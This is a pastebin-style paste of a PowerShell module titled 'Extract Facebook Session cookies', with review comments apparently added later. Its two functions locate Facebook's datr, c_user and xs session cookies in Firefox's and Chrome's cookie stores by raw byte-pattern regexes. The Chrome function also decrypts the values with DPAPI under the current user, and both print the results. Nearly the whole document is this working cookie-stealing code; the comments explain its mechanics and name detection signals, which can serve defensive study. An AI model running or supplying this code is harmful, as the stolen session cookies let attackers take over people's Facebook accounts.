oXis

Extract Facebook Session cookies

Mar 17th, 2017
  1. # Instructions: import the module, then run the command needed.
  2.  
  3. # Chrome Facebook cookies extraction
  4. # Use: Get-FacebookCreds [path to Login Data]
  5. # Path is optional, use if automatic search doesn't work
  6.  
  7. function Get-FacebookCreds-Firefox() {
          # Purpose: reads a Firefox cookies.sqlite file as raw bytes and prints whatever
          # follows the byte strings "facebook.com" + "datr" / "c_user" / "xs" (the hex
          # escapes in the three regexes below decode to exactly those ASCII strings).
          # Parameter: -Path (optional). When empty, the cookie store of a "*.default"
          # profile under %USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles is used.
          # Output: three plain strings written to the pipeline.
          # NOTE(review): no decryption call appears in this function, so the values are
          # taken from the file as stored. They are session identifiers, so any place
          # this output lands (console, transcript, log) holds credential material.
          # NOTE(review): for detection, the file-level behaviour visible here is a
          # process other than the browser opening cookies.sqlite for reading.
  8.     Param(
  9.         [String]$Path
  10.     )
  11.  
  12.     if ([String]::IsNullOrEmpty($Path)) {
  13.         # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
          # The wildcard result is assigned back to the [String]-typed $Path parameter
          # (PowerShell variable names are case-insensitive, so $path is $Path).
          # NOTE(review): zero or several matching profiles are not handled separately.
  14.         $path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
  15.     }
  16.  
  17.     if (![system.io.file]::Exists($Path))
  18.     {
  19.         Write-Error 'Firefox db file doesnt exist, or invalid file path specified.'
  20.         Break
  21.     }
  22.  
          # NOTE(review): nothing from System.Security is referenced in this function;
          # this line looks carried over from the Chrome variant.
  23.     Add-Type -AssemblyName System.Security
  24.     # Credit to Matt Graeber for his technique on using regular expressions to search for binary data
          # FileStream arguments are FileMode 'Open', FileAccess 'Read', FileShare 'ReadWrite'.
  25.     $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
          # Code page 28591 is ISO-8859-1: every byte maps to one character, which is
          # what lets the regexes below address raw byte values in the file.
  26.     $Encoding = [system.Text.Encoding]::GetEncoding(28591)
  27.     $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
  28.     $BinaryText = $StreamReader.ReadToEnd()
  29.     $StreamReader.Close()
  30.     $Stream.Close()
  31.  
  32.     # First the magic bytes for the facebook string, datr size is 24
          # Pattern = "facebook.com" + "datr", then a capture of exactly 24 characters.
  33.     $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
  34.     $PwdMatches = $PwdRegex.Matches($BinaryText)
          # Matches() returns every hit in the file; .groups[1] is read off that collection.
          # NOTE(review): the zero-match and multi-match cases are not distinguished here.
  35.     $datr = $PwdMatches.groups[1]
  36.  
  37.     "datr is $datr"
  38.  
  39.     # First the magic bytes for the facebook string, c_user size is 15
          # Pattern = "facebook.com" + "c_user", then a capture of exactly 15 characters.
          # NOTE(review): the length is fixed, so the capture may not line up with the
          # real value boundary - confirm against the actual record layout.
  40.     $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
  41.     $PwdMatches = $PwdRegex.Matches($BinaryText)
  42.     $c_user = $PwdMatches.groups[1]
  43.  
  44.     "c_user is $c_user"
  45.  
  46.     # First the magic bytes for the facebook string, xs size is 44
          # Pattern = "facebook.com" + "xs", then a capture of exactly 44 characters.
  47.     $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
  48.     $PwdMatches = $PwdRegex.Matches($BinaryText)
  49.     $xs = $PwdMatches.groups[1]
  50.  
  51.     "xs is $xs"
  52. }
  53.  
  54. function Get-FacebookCreds-Chrome() {
          # Purpose: reads Chrome's Cookies file as raw bytes, locates the records for
          # ".facebook.com" + "datr" / "c_user" / "xs" (the hex escapes in the regexes
          # decode to those ASCII strings), and passes the bytes that follow to
          # ProtectedData.Unprotect before printing the result.
          # Parameter: -Path (optional). Defaults to the Default profile's Cookies file
          # under %USERPROFILE%\AppData\Local\Google\Chrome\User Data.
          # Output: three plain strings written to the pipeline.
          # NOTE(review): Unprotect is called with CurrentUser scope and no extra
          # entropy ($null), so the only condition visible here for decryption is
          # running as the same Windows user. This layer therefore gives no protection
          # against code already executing in that user's session.
          # NOTE(review): the printed values are session identifiers; any place this
          # output lands (console, transcript, log) holds credential material. For
          # detection, the behaviour visible here is a non-browser process reading the
          # Cookies file and then calling DPAPI Unprotect.
          # NOTE(review): the hard-coded blob lengths (242/226/258) are tied to the
          # storage layout at the time of the paste (Mar 2017); later Chrome releases
          # changed how cookie values are stored - confirm before relying on them.
  55.     Param(
  56.         [String]$Path
  57.     )
  58.  
  59.     if ([String]::IsNullOrEmpty($Path)) {
  60.         $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
  61.     }
  62.  
  63.     if (![system.io.file]::Exists($Path))
  64.     {
  65.         Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
  66.         Break
  67.     }
  68.  
          # System.Security supplies the ProtectedData class used below.
  69.     Add-Type -AssemblyName System.Security
  70.     # Credit to Matt Graeber for his technique on using regular expressions to search for binary data
          # FileStream arguments are FileMode 'Open', FileAccess 'Read', FileShare 'ReadWrite'.
  71.     $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
          # Code page 28591 is ISO-8859-1: every byte maps to one character, so the
          # regex matches can be turned back into the original bytes with GetBytes().
  72.     $Encoding = [system.Text.Encoding]::GetEncoding(28591)
  73.     $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
  74.     $BinaryText = $StreamReader.ReadToEnd()
  75.     $StreamReader.Close()
  76.     $Stream.Close()
  77.  
  78.     # First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
          # Group 1 is the cookie name. Group 2 is the 4-byte marker 01 00 00 00 plus
          # the next 242 bytes (presumably the DPAPI blob header and body).
  79.     $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
  80.     $PwdMatches = $PwdRegex.Matches($BinaryText)
  81.  
  82.     # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
          # NOTE(review): $Pwd is the same name as the automatic variable $PWD (names
          # are case-insensitive). The "Pwd" naming holds a cookie blob here, not a
          # password - presumably carried over from a password-oriented script.
  83.     $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
  84.     $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
  85.     $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt)
  86.  
  87.     "datr is $DecPwd"
  88.  
  89.     # First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
          # Same steps as above for the c_user record, with a 226-byte body after the marker.
  90.     $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
  91.     $PwdMatches = $PwdRegex.Matches($BinaryText)
  92.  
  93.     # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
  94.     $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
  95.     $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
  96.     $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt)
  97.  
  98.     "c_user is $DecPwd"
  99.  
  100.     # First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
          # Same steps as above for the xs record, with a 258-byte body after the marker.
  101.     $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
  102.     $PwdMatches = $PwdRegex.Matches($BinaryText)
  103.  
  104.     # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
  105.     $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
  106.     $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
  107.     $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt)
  108.  
  109.     "xs is $DecPwd"
  110. }